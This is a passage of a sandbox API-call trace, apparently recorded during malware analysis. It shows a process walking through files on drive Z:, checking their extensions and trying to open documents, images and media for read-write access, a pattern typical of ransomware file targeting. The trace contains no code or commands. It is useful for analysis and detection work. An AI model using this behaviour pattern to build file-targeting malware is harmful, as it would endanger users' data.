hTemplateFile=0x0) returned 0xffffffff [0186.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.896] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd1d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b2RYQsRYMuiCI5kbmBC.avi", cAlternateFileName="")) returned 1 [0186.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.896] PathFindExtensionW (pszPath="Z:\\b2RYQsRYMuiCI5kbmBC.avi") returned=".avi" [0186.901] CreateFileW (lpFileName="Z:\\b2RYQsRYMuiCI5kbmBC.avi" (normalized: "z:\\b2ryqsrymuici5kbmbc.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.903] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf76c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OU7w0ZlZCz.png", cAlternateFileName="")) returned 1 [0186.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.903] PathFindExtensionW (pszPath="Z:\\OU7w0ZlZCz.png") returned=".png" [0186.907] CreateFileW (lpFileName="Z:\\OU7w0ZlZCz.png" (normalized: "z:\\ou7w0zlzcz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.908] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1025d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vHFD0HXkcrOt.ppt", cAlternateFileName="")) returned 1 [0186.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.909] PathFindExtensionW (pszPath="Z:\\vHFD0HXkcrOt.ppt") returned=".ppt" [0186.912] CreateFileW (lpFileName="Z:\\vHFD0HXkcrOt.ppt" (normalized: "z:\\vhfd0hxkcrot.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.917] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14f11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U2QSFlSKH2V.jpg", cAlternateFileName="")) returned 1 [0186.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.917] PathFindExtensionW (pszPath="Z:\\U2QSFlSKH2V.jpg") returned=".jpg" [0186.923] CreateFileW (lpFileName="Z:\\U2QSFlSKH2V.jpg" (normalized: "z:\\u2qsflskh2v.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.924] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x74a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NW3xaHb7.gif", cAlternateFileName="")) returned 1 [0186.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.925] PathFindExtensionW (pszPath="Z:\\NW3xaHb7.gif") returned=".gif" [0186.929] CreateFileW (lpFileName="Z:\\NW3xaHb7.gif" (normalized: "z:\\nw3xahb7.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.931] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x82b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ybbGvlCczfIkCAzvoOo.ods", cAlternateFileName="")) returned 1 [0186.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.931] PathFindExtensionW (pszPath="Z:\\ybbGvlCczfIkCAzvoOo.ods") returned=".ods" [0186.935] CreateFileW (lpFileName="Z:\\ybbGvlCczfIkCAzvoOo.ods" (normalized: "z:\\ybbgvlcczfikcazvooo.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.936] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AEuRQDrOl9iFUCUZ.gif", cAlternateFileName="")) returned 1 [0186.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.936] PathFindExtensionW (pszPath="Z:\\AEuRQDrOl9iFUCUZ.gif") returned=".gif" [0186.940] CreateFileW (lpFileName="Z:\\AEuRQDrOl9iFUCUZ.gif" (normalized: "z:\\aeurqdrol9ifucuz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.942] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xebaa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oHbaMQLYen9icdKg.docx", cAlternateFileName="")) returned 1 [0186.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.942] PathFindExtensionW (pszPath="Z:\\oHbaMQLYen9icdKg.docx") returned=".docx" [0186.946] CreateFileW (lpFileName="Z:\\oHbaMQLYen9icdKg.docx" (normalized: "z:\\ohbamqlyen9icdkg.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.947] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17cec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8epnap.wav", cAlternateFileName="")) returned 1 [0186.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.947] PathFindExtensionW (pszPath="Z:\\8epnap.wav") returned=".wav" [0186.952] CreateFileW (lpFileName="Z:\\8epnap.wav" (normalized: "z:\\8epnap.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.954] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x67e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XhyKggx8pHn779f8mb.swf", cAlternateFileName="")) returned 1 [0186.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.954] PathFindExtensionW (pszPath="Z:\\XhyKggx8pHn779f8mb.swf") returned=".swf" [0186.958] CreateFileW (lpFileName="Z:\\XhyKggx8pHn779f8mb.swf" (normalized: "z:\\xhykggx8phn779f8mb.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.959] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x82d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l5waVaq5umcw.wav", cAlternateFileName="")) returned 1 [0186.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.959] PathFindExtensionW (pszPath="Z:\\l5waVaq5umcw.wav") returned=".wav" [0186.964] CreateFileW (lpFileName="Z:\\l5waVaq5umcw.wav" (normalized: "z:\\l5wavaq5umcw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.966] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa870, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gSQ2YGk9scQfUsGUcoij.wav", cAlternateFileName="")) returned 1 [0186.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.966] PathFindExtensionW (pszPath="Z:\\gSQ2YGk9scQfUsGUcoij.wav") returned=".wav" [0186.970] CreateFileW (lpFileName="Z:\\gSQ2YGk9scQfUsGUcoij.wav" (normalized: "z:\\gsq2ygk9scqfusgucoij.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.972] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd55d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H4BFdNII7HeaE.swf", cAlternateFileName="")) returned 1 [0186.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.972] PathFindExtensionW (pszPath="Z:\\H4BFdNII7HeaE.swf") returned=".swf" [0186.976] CreateFileW (lpFileName="Z:\\H4BFdNII7HeaE.swf" (normalized: "z:\\h4bfdnii7heae.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.977] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5b66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dUSDGqr.odt", cAlternateFileName="")) returned 1 [0186.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.977] PathFindExtensionW (pszPath="Z:\\dUSDGqr.odt") returned=".odt" [0186.981] CreateFileW (lpFileName="Z:\\dUSDGqr.odt" (normalized: "z:\\dusdgqr.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.982] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xeb6f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1qRDSM.ots", cAlternateFileName="")) returned 1 [0186.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.983] PathFindExtensionW (pszPath="Z:\\1qRDSM.ots") returned=".ots" [0186.986] CreateFileW (lpFileName="Z:\\1qRDSM.ots" (normalized: "z:\\1qrdsm.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.988] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc96c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3E3mNRHtjqDkD.docx", cAlternateFileName="")) returned 1 [0186.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.988] PathFindExtensionW (pszPath="Z:\\3E3mNRHtjqDkD.docx") returned=".docx" [0186.994] CreateFileW (lpFileName="Z:\\3E3mNRHtjqDkD.docx" (normalized: "z:\\3e3mnrhtjqdkd.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.996] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13677, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZDi6IHm9Gll50uy.wav", cAlternateFileName="")) returned 1 [0186.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.996] PathFindExtensionW (pszPath="Z:\\ZDi6IHm9Gll50uy.wav") returned=".wav" [0187.002] CreateFileW (lpFileName="Z:\\ZDi6IHm9Gll50uy.wav" (normalized: "z:\\zdi6ihm9gll50uy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.004] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x151b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nrhycV54UDwXeOVHbaY.ppt", cAlternateFileName="")) returned 1 [0187.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.004] PathFindExtensionW (pszPath="Z:\\nrhycV54UDwXeOVHbaY.ppt") returned=".ppt" [0187.009] CreateFileW (lpFileName="Z:\\nrhycV54UDwXeOVHbaY.ppt" (normalized: "z:\\nrhycv54udwxeovhbay.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.026] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf1b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SVUGEj8tBupVWECY.xls", cAlternateFileName="")) returned 1 [0187.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.026] PathFindExtensionW (pszPath="Z:\\SVUGEj8tBupVWECY.xls") returned=".xls" [0187.032] CreateFileW (lpFileName="Z:\\SVUGEj8tBupVWECY.xls" (normalized: "z:\\svugej8tbupvwecy.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.034] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x145ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ety66.avi", cAlternateFileName="")) returned 1 [0187.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.034] PathFindExtensionW (pszPath="Z:\\Ety66.avi") returned=".avi" [0187.038] CreateFileW (lpFileName="Z:\\Ety66.avi" (normalized: "z:\\ety66.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.040] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17f4f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="quWT4PWu.png", cAlternateFileName="")) returned 1 [0187.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.040] PathFindExtensionW (pszPath="Z:\\quWT4PWu.png") returned=".png" [0187.044] CreateFileW (lpFileName="Z:\\quWT4PWu.png" (normalized: "z:\\quwt4pwu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.047] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x117b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j9JYPCvbXdUa8a9vWWKs.pptx", cAlternateFileName="")) returned 1 [0187.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.048] PathFindExtensionW (pszPath="Z:\\j9JYPCvbXdUa8a9vWWKs.pptx") returned=".pptx" [0187.052] CreateFileW (lpFileName="Z:\\j9JYPCvbXdUa8a9vWWKs.pptx" (normalized: "z:\\j9jypcvbxdua8a9vwwks.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.054] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15446, dwReserved0=0xa0000003, dwReserved1=0x0, 